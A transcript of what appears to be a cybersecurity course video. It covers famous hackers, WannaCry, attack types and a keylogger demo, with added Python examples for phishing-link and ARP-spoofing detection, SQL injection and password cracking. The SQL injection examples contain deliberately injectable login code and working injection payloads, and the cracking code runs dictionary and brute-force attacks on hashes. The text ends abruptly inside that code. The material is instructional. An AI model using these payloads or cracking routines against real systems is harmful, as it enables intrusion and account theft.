Moving on to the hacker at number two. At number two we have Gary McKinnon. He is a Scottish systems administrator and hacker accused of carrying out the biggest military computer hack of all time. In 2002 he identified himself as Solo through an odd message on a US Army computer; it was later found to be Gary McKinnon. He was accused of infiltrating 97 United States military and NASA computers by installing viruses and deleting a few files over 13 months, between February 2001 and March 2002. This was the biggest military computer attack of all time: it shut down the US military's Washington network for 24 hours. What is fascinating is his reason: much of his hacking was in search of information on UFOs that he believed the US government was hiding in its military computers.

And finally let's see who we have at number one. At number one we have Kevin Mitnick. The now affluent American entrepreneur was once one of the most wanted cyber criminals in the US. Kevin, who is currently a security consultant, was once convicted of hacking Motorola, Nokia and the Pentagon. Kevin mastered computer hacking and social engineering early and got his start as a teen. In 1982 he is said to have hacked the North American Aerospace Defense Command, an exploit popularly credited with inspiring the 1983 film WarGames. In 1989 he hacked Digital Equipment Corporation's network and made copies of their software. It is largely believed that he once obtained full control of Pacific Bell's network merely to prove that it could be done; he never exploited the data he obtained. According to reports, Mitnick gained unauthorized access to dozens of computer networks while he was a fugitive. After five years of imprisonment Mitnick started afresh and became a security consultant. His knack with computers is still remembered.

All of these hackers were unbelievably skilled at what they did. A few of them faced jail time, and a few others have since put their cyber skills to better use by becoming security advisers and helping humankind. Hacking skills aren't a form of criminal behavior if they are put to

good use.

Where organizations have faced cyber crimes in the recent past, the different types of cyber attacks, the reasons for these cyber attacks, and then we are going to delve into what exactly cyber security is and what is expected of us as cyber security experts to provide as a cyber security solution. Then we are going to look at some basic network terminologies which will help us understand cyber security, and some of the terms that are utilized by experts when we deal with cyber security: the goals that we want to achieve when I say I want to be secure. What exactly do I mean when I want to secure an organization? What kind of security parameters are we looking at? Then we are going to look at different ways of tackling cyber crime in today's world, and lastly we've got a very interesting demo on Metasploit, where we are going to test a vulnerable machine and try to hack it. Now, Metasploit is a penetration testing tool widely used by security experts and hackers to test and try to penetrate different systems, so we have a very good demo on that and we'll be looking at that at the end of this particular video.

Let's begin with the rise in cyber crimes. So let's talk about WannaCry. This is something that happened way back in 2017; let's not say way back, it's just 2019 now, two years back, and it took the world by storm. It was a cyber attack which encrypted the data of organizations, and then the hackers held those organizations to ransom by asking, or rather demanding, money from them to decrypt their own data. So what exactly happened? The attack originated in Asia and then spread across the rest of the world. Note the date. And how did this happen? There was a vulnerability that was identified in Microsoft Windows, the SMB vulnerability. SMB, which is Server Message Block, is essentially the file sharing and printer sharing service that you use in a LAN environment on the Windows operating system. By default these are enabled on your desktops, and there is a hardening guide that people utilize either to upgrade the version of SMB to a more secure version or to disable SMB and utilize something else. Now, this was a known vulnerability, and it was targeted: within days more than 230,000 computers were infected across 150 countries.

Now, when we say this was identified, Microsoft knew of this vulnerability and in fact had released a patch in March 2017 to mitigate it; within two months of that release this attack had happened. Now, in a real-world scenario it is not possible for all the servers and devices to be upgraded to the latest patch level, because organizations need to test those patches to see if they are going to interfere with the services that they are providing, and hence no organization will be completely patched at any point in time. This was the flaw that sadly took down a lot of organizations: the patch was available, but some were still testing it or not utilizing it yet, and they did not see it as a high-value risk, and suddenly something happened and WannaCry took place. Now, what happened was a crypto worm called WannaCry, which basically encrypts the data and locks the user out of their own computer. They get a screen in front of them which says your data has been encrypted, it gives them a link, and the attackers demand 300 to 600 dollars to be paid to retrieve the decryption key for their data. Now here, obviously, you're not going to pay cash to hackers, neither are you going to make a bank transfer, because both of those ways can identify the hackers and let you pursue them. So the hackers demanded this exchange via the Bitcoin cryptocurrency.

This is the best way to remain anonymous and the best way to make payments over the internet without being identified. So what was the impact of the attack? Around 200,000 to 300,000 computers were infected. Now, it sounds like a small number of computers when you're talking globally; however, the services that it affected were huge. In the UK the National Health Service got affected: all the databases got encrypted and surgeries and treatments of patients were postponed. FedEx, Renault, Nissan, all of these organizations got compromised and the production lines basically shut down for a few days till they retrieved data from backup, started to restore and then tried to bring everything back to normal.

Then in February 2019 Dunkin' Donuts announced that the users of their rewards program were targeted by a credential stuffing attack. That means the attackers took usernames and passwords leaked from other sites and tried them against customers' Dunkin' Donuts accounts, getting into every account where the credentials matched. Now we think, Dunkin' Donuts, they sell donuts, how much could it impact anyone? But if you have an online account with Dunkin' Donuts, you also have your personally identifiable information stored in that account, for example your name, address, credit card information, maybe your social security number or your national insurance number or something like that, which can lead to identity theft. People can misuse that information, pretend to be you, and then take out loans or do transactions in your name, where you are going to end up paying those bills. So stealing this kind of data is going to impact all the users adversely. So the first name, last name and email IDs were stolen; that is still good enough to launch social engineering attacks and target these victims with phishing attacks or similar attacks.

So now let's look at the different types of attacks in cyber. So we are going to

discuss these six: malware, social engineering attacks, man-in-the-middle attacks, denial of service, SQL injection and password attacks. Now, if you look at these, malware basically targets hosts and operating systems. Social engineering attacks attack the gullibility of a human being with the help of a computer, for example by sending a fake mail or hosting a fake website. A man-in-the-middle attack targets a network and tries to capture data packets within the network, thus compromising your credentials. A denial-of-service attack crashes a service. SQL injection attacks attack an application, and a password attack attacks the usernames and passwords of accounts, taking advantage of weak passwords to get access to your accounts.

So let's start with malware. Malware basically refers to malicious software: the 'mal' from malicious and the 'ware' from software becomes malware. Malware is nothing but a vehicle in which hackers embed payloads; payloads could be viruses, worms, ransomware, trojans. So they hide these kinds of malicious software within legitimate-looking software and post them on the internet. People who are interested in that kind of software will obviously download it, and since it looks very legitimate they will try to install it, thus accidentally and unknowingly installing a trojan, virus or ransomware on their machine. Now, most of us have done this at one point in time, where we have looked for pirated software because we did not want to pay for it, and then we probably go to torrents and search for that software, download it, and there's a keygen.exe over there which we have to execute; then we have to copy the code, or take the exe file that comes with the keygen and replace the original with it. I mean, it's a very convoluted process, but the fact that you have to replace some code with some other code basically means that there is something wrong with that file, so 99 percent of the time these programs would have viruses or trojans embedded within them, and it is going to affect the security posture of your computer. If you scan a keygen.exe with any antivirus across the globe, it will always report it as malware and will probably want to delete that kind of file.

So how does a system get infected? It gets infected when the user clicks on a suspicious link. Now, obviously, if you think it is a suspicious link you're not going to click on it, but you press the link or you're compelled to click on it just out of curiosity. Let's say you click on that link: there's a redirector, it downloads an attachment from a malicious server, and it gets installed on your machine.

One of the most common ways a virus or a worm is spread is through USB devices. People pass around USB devices like nobody's business, you have no idea where the device has been used before, you plug it into your machine, and if there is a virus on that USB device your machine will get infected as well. Malware is nothing but malicious software that poses as legitimate software but will have a virus, trojan or worm embedded within it. It could also be a keylogger. A keylogger is nothing but another piece of software that is created to catch all the keystrokes that the user is making, create a copy of them and store them for the hacker, so whatever the user is typing will now be known to the hacker. It could be bank details, passwords, any personal information that the user might want to keep secret.

We are going to look at three different demos here. This demo is just to showcase a couple of things; we're going to look at a keylogger and how a keylogger works. On this virtual machine I've already downloaded a keylogger and installed it. The idea of this demo is to showcase how a keylogger functions. So you can see on the screen we are using Free Keylogger, from its download page on Softonic, and you can download the free keylogger right from here. What I've done for my demos is that I've always had a keylogger running in the background to capture all the keystrokes that I've been doing whenever I'm doing any demos. So this keylogger here can actually be hidden in the taskbar, but for our demo purposes I have kept it visible. When you click on it, it will open up and give you a basic screen where you can start navigating around the keylogger. Now you can see that on the 8th, which is today, it already shows some keystrokes, applications and some visited websites, as I have already been browsing using the browser over here, and this has been recorded by the keylogger in the background. Just to give you an example, if I click on this file you will see all the keystrokes that I have been doing so far: you can see I've opened up my Mozilla Firefox, I've typed in a search keyword of 'free key logger', then I've gone on to the website howsecureismypassword.net, in which I may have tried out a few passwords myself, and then I've gone and copy-pasted this URL into the browser window. You can see all of this has been recorded. Just to emphasize that, let's go on to another website; let's say, let's go to facebook.com.

I'm not actually going to log in; I'm just going to type in a random username, so someone@simplilearn.com, and a password like asd@1234, and I'm going to try to log in. Obviously the login is going to fail because this account doesn't exist, but we want to see what happens in the background when the keylogger picks up the keystrokes that we have typed. So let's open up the keylogger again and go and see what is there in the keystrokes and clipboard, and you can see over here that we typed in facebook.com, enter, and then we did not type in the username; that's the difference here. We selected it from a drop-down, so a keystroke logger or keylogger has not been able to capture that input. A keylogger, in its essence, only records something that has been typed in by the user in real time. Since we did not type in the username it did not record that username, but we typed in the password, and you can see the password over here, asd@1234. This is how a keylogger works: it only captures the keystrokes that have been typed in real time. So if we use this exercise on our victims and they're just using drop-down menus at that point in time, none of the data is going to be recorded for that activity; you would need something which is known as spyware, which would capture screens and thus capture all of this information that is going on.

Now, apart from just logging keystrokes, what this software also does is keep a list of used applications: you can see all the applications that have booted up along with the operating system and the ones that have started up after the operating system has booted. It also has a list of the visited websites, so you can see these are the websites that we have been visiting, and they have been listed right here, the last one being Facebook login or sign up. So this can store history for a really long time: if I go back in time and look at some of the demos that I've been doing, on the 14th of September these were the keystrokes that I utilized when I was doing some training, while I was providing some demos on other topics. So a keylogger will store all that information and keep on recording it till you actually delete that data or reset the keylogger. You can also set up the keylogger to send you a daily report by email to a particular email address that you've set, so as long as it detects internet connectivity this keylogger will send an email to the email address that you have specified with all the keystrokes that it has logged. Now, this is the free version; there's again a paid version for it, so you can go and visit this site and see how this keylogger functions. If I press on the X button over here, it will ask me if I want this to be hidden in the system tray; if I click on yes, only using this shortcut will I be able to invoke this screen. So just for demo purposes I do not want this to be hidden, so I'm going to click on no, and you can see that the keylogger is still visible over here. So that was the first demo

that we are seeing.

Viruses, as we all know, are destructive programs that, once executed, would destroy data or harm the hard disk or the partition tables. Worms, on the other hand, are software that is more of a nuisance: they replicate themselves in such a way that they consume the resources of a computer, thus crashing the computer and then requiring a reboot. A trojan horse is another piece of software that allows a backdoor entry or a covert channel to the hacker, where the hacker would then be able to gain access to the victim's machine through the covert channel or the back door without the knowledge and authorization of the user.

Let's talk about social engineering attacks. Now, this is where your people skills come into the picture: this is the art of manipulating people and convincing them to give up confidential information, either knowingly or unknowingly. Well, we trust our friends, right? We talk to them a lot and we give out some confidential information which we would not give out to others. What if somebody is pretending to be our friend just to get this information out of us? We trust this person, we give out that information and we suddenly get affected because of that. Now, I'm not saying that everybody in the world does that, but it is one of the most common attacks that is experienced in the computing world.

Now, social engineering attacks can be broken down into three categories. First is a phishing attack; don't worry about the figure over there, you're actually not going to go fishing, it's what is known as a phishing attack. Then there is a spear phishing attack, and then there's a whaling attack. All of these are types of social engineering attacks where you are targeting a user by sending out fake mails or fake websites, relying on their gullibility in clicking on those links and then giving out information. So what is a phishing attack? It is a practice wherein a hacker usually sends fake mails which look really genuine, or hosts fake websites which also look genuine and look like they're from a trusted source. Once you click on those links there would be embedded scripts or embedded malware which would then be executed and get installed on your machine, compromising the security of your device. These utilities could be used to steal credit card information, steal data from your computer, upload data to your computer, use your computer as a bot, and anything and everything that the hacker might want to do. Spear phishing is a variation of phishing. Now, phishing is a non-targeted attack: it is to the whole world at large, and whoever becomes a victim becomes a victim. However, spear phishing is a targeted attack: it is to a specific individual or to a group of individuals in an organization, so it becomes a customized attack. You identify the victim, you identify the flaws that exist over there in the organization, you identify the gullibility of the victim, create a fake mail to suit that particular situation, and send it across to them; they'll click on that link and get infected by whatever payload you have embedded within it. Whaling is when you are targeting particularly wealthy or powerful people in the industry, so normally when you're targeting CEOs, CFOs and high-level management people of an organization it would be known as a whaling attack.

So here the example is where an email has been received: 'Dear customer, your account is going to expire today. To keep your account activated, please click on the link here and proceed with the verification process.' Now here the link that we see, activate.com, would be a hyperlink which masks the actual URL the link is going to redirect us to. The attack here is on the gullibility of the customer, who would fear that the account is about to be deactivated, and to prevent that they would open this email, click on the link and then provide the information, thinking that they're just reactivating their account, but they're actually leaking their own information to the attacker. So the first thing you have to understand is that banks, or any organization, are not going to send you any emails with a link in them asking you to reactivate anything like that; in fact, banks proactively tell us that they are not going to call us and ask for any information, and that they would want us to call them on their registered number or the helpline number that they have declared on their website or on the cards that we possess.

Then moving on to social engineering. This is something very common in today's world; this is basically where the prey is the human itself, and the reason social engineering attacks are very successful is because of the gullibility factor that a human has. For example, a human has something called emotions that a machine wouldn't: you could plead with a human for a password to be reset by gaining sympathy or empathy, but try doing that with a machine and those attacks are going to fail. Social engineering attacks are not only limited to those, but we can talk about phishing; phishing is also a part of social engineering attacks, where the gullibility of the user to click on that link is being exploited.
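The masked hyperlink in the 'your account is going to expire' mail above can be caught mechanically. As an added example that is not part of the course material, the Python below parses the anchors in an HTML mail body and flags any link whose visible text looks like a domain that differs from the host the href really points at. The sample mail, the domains mybank.example and activate.com as used here, and the crude 'last two labels' domain comparison are all constructed for the illustration.

```python
"""Flag phishing-style links whose visible text does not match the real target.

Added example (not part of the original course material): parses the anchors
in an HTML e-mail body and reports any link whose displayed text looks like a
URL or domain that differs from the host the href actually points at.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _AnchorCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> tag in a document."""

    def __init__(self):
        super().__init__()
        self.anchors = []   # finished (href, text) pairs
        self._href = None   # href of the <a> currently open, if any
        self._text = []     # text fragments seen inside that <a>

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Lower-cased host of a URL; tolerates bare 'example.com/path' with no scheme."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def registrable_part(host):
    """Crude 'last two labels' comparison (constructed heuristic, not a public-suffix list)."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def suspicious_links(html_body):
    """Return [(visible_text, real_href)] for anchors whose shown domain differs from the real one.

    Only anchors whose visible text itself looks like a URL or domain are judged;
    a plain label such as 'click here' carries no domain to compare against.
    """
    parser = _AnchorCollector()
    parser.feed(html_body)
    parser.close()
    flagged = []
    for href, shown in parser.anchors:
        if "." not in shown or " " in shown:
            continue  # not a URL-looking label; nothing to compare
        if registrable_part(host_of(shown)) != registrable_part(host_of(href)):
            flagged.append((shown, href))
    return flagged


# Constructed sample mail body modelled on the 'your account is going to expire' lure.
# The second link shows a bank domain but really points at an attacker-controlled IP.
SAMPLE_EMAIL = """
<p>Dear customer, your account is going to expire today.</p>
<p>To keep it active please <a href="http://activate.com">click here</a>.</p>
<p>Or go to <a href="http://198.51.100.23/login">https://www.mybank.example</a></p>
<p>Help: <a href="https://www.mybank.example/help">www.mybank.example/help</a></p>
"""

if __name__ == "__main__":
    for shown, real in suspicious_links(SAMPLE_EMAIL):
        print(f"link text {shown!r} actually points at {real!r}")
```

Only the second link is reported: the first has no domain in its text to compare, and the third shows and targets the same host. A mail client that renders HTML hides exactly this difference, which is why hovering over a link before clicking is still worth teaching.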

In this scenario here, this is Clark; he's calling from the IT security team. That means that he is probably impersonating, and then telling the victim that the system has been compromised: please share the password with me. The victim, on the other hand, thinks that the person is trying to help her, probably doesn't verify that person, trusts that person, and then provides the password over the phone. Now here it is fear that is being exploited, because the password being compromised would clearly upset the end user, for the loss of data or for the computer revealing confidential information; thus she's trusting the IT security team for the password to be reset and given back to her.

Then we come to the network attacks: man in the middle. This is also known as an eavesdropping attack, which literally means that you are going to listen in on somebody's conversation. For example, in the figure the client is trying to talk to the server, but you become a man in the middle and you try to listen in on the conversation that is going on. Now, obviously, the conversation over here may not be audio, but the data that is being exchanged between the server and the client: you just listen in, you make a copy of that data and you store it at your end. The data could contain usernames, passwords, confidential information, and help you compromise data. The attacking computer takes the IP address of the client, so you find out the IP address of the client, and the client is not aware of this. The client is trying to communicate with the server; you spoof yourself as the default gateway or a trusted device, and the client thinks that it is through you that they need to communicate with the server, and thus they start sending data via your PC. So this attack normally happens on public Wi-Fi networks, I've seen that happening a lot, and thus I never recommend anyone using public Wi-Fi. For example, you go to a coffee shop, they have free Wi-Fi over there, you connect to it and you start surfing, you start browsing, you are always signed into your Google and Facebook accounts, your bank accounts and what not, and then there's a sniffer, there is a hacker who is doing a man-in-the-middle attack capturing all that data. Now, it's not an easy attack, but it can be done. So this diagram shows where the man-in-the-middle attack has become successful, and now the client and the server are both sending information via the attacker without knowing that the attacker is capturing all that data.
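The gateway impersonation just described is usually done on a LAN with spoofed ARP replies: the attacker tells the client that the gateway's IP now lives at the attacker's MAC, and tells the gateway the same about the client. As an added example, not part of the original course, here is a small detector in Python that replays a constructed log of ARP replies (the kind a sniffer on the victim's network would print) and raises an alert when an IP's MAC changes from the one first learned, or when one MAC starts answering for several IPs. The addresses, MACs and the one-IP-per-MAC threshold are assumptions for the demo.

```python
"""Spot an ARP-spoofing man-in-the-middle from a log of ARP replies.

Added example, not from the original course. A sniffer on the victim's LAN
would normally supply these records; here they are constructed inline. The
detector remembers the first MAC seen for each IP and alerts when a later
reply claims a different MAC for that IP (gateway impersonation), and also
when a single MAC claims more IPs than a router legitimately should.
"""
from collections import defaultdict

# Constructed ARP-reply log: (seconds, "ip is-at mac"), as a sniffer might print it.
# 192.168.1.1 is the real default gateway (aa:...:01); 192.168.1.50 is the attacker.
SAMPLE_ARP_LOG = [
    (0.0, "192.168.1.1 is-at aa:bb:cc:dd:ee:01"),
    (0.5, "192.168.1.20 is-at aa:bb:cc:dd:ee:20"),
    (1.0, "192.168.1.50 is-at de:ad:be:ef:00:50"),
    (30.0, "192.168.1.1 is-at de:ad:be:ef:00:50"),   # attacker poisons the gateway entry
    (31.0, "192.168.1.20 is-at de:ad:be:ef:00:50"),  # ...and the client's entry, to relay both ways
]


def parse_reply(line):
    """Parse 'ip is-at mac' into (ip, mac), MAC normalised to lower case."""
    ip, keyword, mac = line.split()
    if keyword != "is-at":
        raise ValueError(f"not an ARP reply: {line!r}")
    return ip, mac.lower()


def detect_arp_spoofing(log, max_ips_per_mac=1):
    """Return a list of alert strings found in a (timestamp, line) log.

    Two heuristics are applied:
      * an IP whose MAC differs from the one first learned (a spoofed reply), and
      * a MAC answering for more IPs than max_ips_per_mac allows; legitimate
        routers can proxy-ARP, so the threshold of 1 is an assumption here.
    Limitation: if the attacker's reply is the first one seen, the genuine
    device is what gets flagged later, so pair this with a known-good table.
    """
    first_mac = {}                  # ip -> MAC learned first
    ips_for_mac = defaultdict(set)  # mac -> every IP it has claimed
    alerts = []
    for ts, line in log:
        ip, mac = parse_reply(line)
        known = first_mac.setdefault(ip, mac)
        if mac != known:
            alerts.append(f"t={ts:.1f}s {ip} changed from {known} to {mac}")
        ips_for_mac[mac].add(ip)
        if len(ips_for_mac[mac]) > max_ips_per_mac:
            alerts.append(f"t={ts:.1f}s {mac} claims {sorted(ips_for_mac[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP_LOG):
        print("ALERT", alert)
```

On the sample log the first three replies are quiet; the two poisoning replies at t=30 and t=31 each trigger both heuristics, so four alerts come out. Tools such as arpwatch implement the same idea against live traffic; the code above is deliberately the minimal version of it.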

Here, suppose you're in trouble and you need money right now, and you call your friend and ask for money. So here the person is calling John, telling John that they're in trouble and asking John to give their credit card number over the phone. Now, this is a legitimate transaction: the friend is actually calling John and asking for some help. However, when John is providing that help over the phone with the credit card number, maybe the CVV number and all of that, and then the OTP at the end of it, at the same time there could be a hacker doing a man-in-the-middle attack where they could be eavesdropping on whatever is being said or whatever data is being transferred, and once they capture this confidential data they can then misuse that data for their own gains.

Then comes the denial-of-service attack. The motive in a DoS attack is not to benefit monetarily but to bring down a service for legitimate users; that's just causing harm to the organization. For example, if I consume the bandwidth to a particular website, since there is no more bandwidth left, other legitimate users who want to interact with the website will not be able to connect to it, thus creating a denial of service to those legitimate users. Now, it may not be possible for me to use my laptop to target a cluster of servers, because obviously the bandwidth at the other end would be very high, so I would distribute my attack across multiple devices, thus creating a distributed denial of service, also called a DDoS attack.

Then we come to SQL injection, or SQLi. SQL stands for Structured Query Language, which is the de facto language that is used by applications to interact with databases, be it a Microsoft SQL database, a MySQL database or Oracle SQL.
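Before the explanation that follows, here is the attack in code. This is an added example, not from the course: a login that concatenates user input into its query sits next to the same login written with bound parameters, both run against an in-memory SQLite table holding one constructed account ('alice'). The payload is the classic quote-and-OR trick; the account name and table are assumptions for the demo.

```python
"""SQL injection: the vulnerable query next to its parameterised fix.

Added example, not from the original course. An in-memory SQLite database
stands in for the application's backend. Both login functions express the same
'select the user whose name and password match' query; only the way the
user-supplied strings reach the database engine differs.
"""
import sqlite3


def make_db():
    """Build a throwaway users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, so input is parsed as SQL.

    The database cannot tell a legitimate query from a malicious one; it
    executes whatever text it is handed, which is exactly the problem.
    """
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Uses bound parameters: the engine receives the query shape and the
    values separately, so quotes inside the input never become SQL syntax."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


# Classic payload: closes the string literal, makes the WHERE clause always
# true with OR '1'='1', and comments out the rest of the original query.
INJECTION = "' OR '1'='1' -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, unknown user + injection:", login_vulnerable(db, "nobody", INJECTION))
    print("safe, same input:", login_safe(db, "nobody", INJECTION))
```

With the injected string the concatenated query becomes `... WHERE username = 'nobody' AND password = '' OR '1'='1' -- '`, so the vulnerable path returns alice without any valid credential, while the parameterised path returns None because the payload is compared as a literal password. Parameterisation is the fix the course text is about to describe as 'sanitizing at the application level'; it does not reduce what the database account itself may do, so the connection should also hold only the privileges the application needs.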

The syntax may be a little bit different, but it is still the Structured Query Language that applications utilize to interact with the database. Now, the queries that are created by the applications need to be sanitized at the application level itself, so developers need to be very careful about how they are going to create those queries and what queries are allowed to go to the database, because a database is designed to answer queries: it doesn't know what is a legitimate query and what is an illegitimate query. If it receives a query it is going to try to execute it and give out information. Thus a hacker may insert malicious or malformed queries into a SQL server through the vulnerable application, causing a security event. So depending on the queries that have been created, the attacker could delete some data, modify data, add data, edit it, or do anything that is malicious in nature that would compromise the integrity and the security of that database. For example, in the Dunkin' Donuts case, apart from it being a credential attack, had the attackers got access to the database they could have added or deleted any information about any users that were there.

A password attack, as the name suggests, is used to crack or get the password for a user's account. When we say crack passwords, this is basically where somebody is trying to brute force or guess the password, and they are going to break the password, thus getting access to your accounts. There are five different ways passwords can be cracked. The first one is a dictionary attack, where we try every password that is possible from a dictionary. Now, this is the use of an actual dictionary, and that's one of the reasons why when we create passwords we are advised not to base them on dictionary words: these are easily guessable, and there are lists already out there that contain all of these words. There's a tool that you can utilize, and that tool will pass through each and every word that is in the dictionary file and compare it to a possible password; if one of the words matches, the password has been compromised. So if you are observing a little bit higher security, where we have created a password that is not based on a dictionary word, then we want to look at other attacks like brute force. It is a trial and error method, so basically what we do is identify how the passwords were created; for example, in today's world the policies would be to use in a password any of the alphabet characters A through Z, uppercase or lowercase, 0 through 9, and special characters, and then to randomize the usage of these characters so that they are not easily guessable. But a brute force attack would then try every permutation and combination that is possible in the entire character set and try to figure out the password. Now, this takes a really long time and does take a lot of compute and storage power, and that's where the botnet example comes back in, the one that we saw earlier which was used for DoS attacks: similarly, if I've infected multiple computers like this, I can then distribute this attack onto all those computers and use the entire compute power that is available to shorten the time required to crack the password. Now, this is in theory 100 percent successful given the time that it may take, so if the time it is going to take is a hundred years, the attack becomes unsuccessful, because during that period the password is most likely to be changed, the technology is going to change, and so on and so forth. So if the password is easily

Guessable this can be a very easy attack to perform then a key logger which is a similar attack to what we have seen so a key logger as discussed earlier is nothing but a software that once installed on your machine would grab each and every key stock that the user

Has made and store it in a file which the hacker can later on access so whatever you have been typing passwords credit card information or anything else all of those would be recorded and stored in the file and that’s one of the best way a password can be compromised

Then shoulder surfing this is a physical attack rather than being a technical one here you need to be physically present when the user is typing in their password and you actually look over their shoulder to see what they’re typing and try to figure out what the password is if they’re quick typers it

Is going to be a little bit more difficult if they’re slow typers it’s going to be that much more easy and the last one is called a rainbow table now passwords when applications store them are stored in hash format hash is nothing but a one way signature that is

Created of the password file of the word that is used for the password and it is based on an algorithm so the input could be a variable length for example a password could be 7 to 14 characters but the output of a hash value would be fixed based on the algorithm that you

Are consuming so most common algorithms in today’s world that we utilize are sha secure hashing algorithms before that we use md5 or message digest so all of these convert the passwords from plain text into a hash value and store it into a database so if you actually attack

That database to grab a password you’re going to get the hash value not the password in clear text and thus in that scenario comes the rainbow table to the rescue a rainbow table is nothing but a file that will have a list of all possible passwords along with their hash

Values in the required format so if you remember the dictionary attack the dictionary attack was nothing but a list of words based on the dictionary that were stored in a file and then the software was just trying each and every word against a possible password here we

Do not have the word but we have the hash value so to reverse engineer hash value what we created is we created a rainbow table where there would be a list of other possible passwords and their corresponding hash values so we then compare the hash value that we have

Captured and then search for that hash value in the file that we have created the hash value that matches the corresponding word to it is the password in clear text so these are the five types of password attacks now let’s talk about the types of network attacks an active attack is

An attack when the intruder attempts to disrupt the net network’s normalcy and modifies the data and alters that data at the same time so as you can see in the diagram there’s a sender and there is a receiver the attacker is the man in the middle who is now trying to create

The active attack so when the sender sends that data to the receiver the attacker intercepts that data modifies the data and then sends the modified data to the receiver since the attackers is a man in the middle as we have seen in the previous attacks the receiver

Neither the sender would be aware of the attacker and thus they would not be aware of the modification that has been done in a passive attack the intruder just eavesdrop on the data they just listen in on to the conversation but they do not modify the data at any time
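Before moving on, here is an added Python example for the SQL injection attack described above; it is not code from the video. It puts a login check that pastes user input into the query text next to the same check with bound parameters. The `users` table, its two accounts, the clear-text passwords (kept unhashed only so the injection stays visible) and the attacker inputs are all constructed for illustration.

```python
"""SQL injection: a login query built by string concatenation next to the
same query with bound parameters.

Added example for this tutorial, not code from the video; the users table,
the two accounts and the attacker inputs are constructed for illustration.
Passwords are stored in clear text here only to keep the injection visible;
a real application stores a salted hash instead.
"""
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "Correct-Horse-42", "admin"), ("bob", "hunter2", "user")],
    )
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """What the vulnerable code sends to the database: user input pasted
    straight into the SQL text, so quotes and comments in the input become
    part of the query's syntax."""
    return (
        "SELECT role FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Returns the role of the first matching row, or None on failure.
    Deliberately injectable: the database executes whatever the string says."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[str]:
    """Same lookup with parameter binding: the driver sends the query text and
    the values separately, so input is always treated as data, never as SQL."""
    row = conn.execute(
        "SELECT role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # Two classic payloads: a comment that discards the password check, and a
    # tautology that makes the WHERE clause true for every row.
    for user, pw in [("alice' --", "anything"), ("nobody", "' OR '1'='1")]:
        print(repr(build_vulnerable_query(user, pw)))
        print("vulnerable:", login_vulnerable(db, user, pw),
              " safe:", login_safe(db, user, pw))
```

Run it and compare the two columns: the concatenated query lets `alice' --` log in as admin without a password and lets `' OR '1'='1` match every row, while the parameterised query returns `None` for both because the quotes arrive as ordinary characters inside the bound value.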
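The password attacks above, the dictionary attack, brute force, and the rainbow-table lookup against stored hashes, as an added Python example that is not from the video. The wordlist, character set and lengths are constructed and deliberately tiny so the block runs in seconds. It goes a little beyond the video in two places: a `keyspace_size` function that shows why brute force "takes a really long time", and a per-user salt that shows why a precomputed table stops working.

```python
"""Password attacks against stored hashes: dictionary, brute force and a
precomputed hash-to-password table, plus the per-user salt that defeats the
precomputed table.

Added example for this tutorial, not code from the video. The wordlist,
character set and lengths are constructed and tiny so the block runs in
seconds; a real attack uses wordlists with millions of entries and GPUs.
"""
import hashlib
import itertools
import os
from typing import Dict, Iterable, Optional, Tuple

# Constructed wordlist standing in for a dictionary file.
WORDLIST = ["password", "letmein", "sunshine", "dragon", "qwerty", "welcome1"]


def sha256_hex(text: str, salt: bytes = b"") -> str:
    """SHA-256 of salt || password: a fast, fixed-length, one-way hash."""
    return hashlib.sha256(salt + text.encode()).hexdigest()


def dictionary_attack(target_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Hash each candidate word and compare with the captured hash."""
    for word in wordlist:
        if sha256_hex(word) == target_hash:
            return word
    return None


def keyspace_size(charset_len: int, max_len: int) -> int:
    """Number of candidates a brute force must try for lengths 1..max_len."""
    return sum(charset_len ** n for n in range(1, max_len + 1))


def brute_force(target_hash: str, charset: str, max_len: int) -> Optional[str]:
    """Try every string over charset up to max_len; cost grows exponentially."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            candidate = "".join(combo)
            if sha256_hex(candidate) == target_hash:
                return candidate
    return None


def build_lookup_table(wordlist: Iterable[str]) -> Dict[str, str]:
    """Precompute hash -> password once; each later lookup is a dict access.
    This is the simplified rainbow table the section describes (a true
    rainbow table stores the same mapping compressed into hash/reduce chains)."""
    return {sha256_hex(w): w for w in wordlist}


def table_lookup(table: Dict[str, str], target_hash: str) -> Optional[str]:
    """Reverse a captured hash by lookup instead of by hashing candidates."""
    return table.get(target_hash)


def store_salted(password: str) -> Tuple[bytes, str]:
    """Store a random per-user salt next to the hash: the same password now
    hashes differently for every user, so a precomputed table is useless."""
    salt = os.urandom(16)
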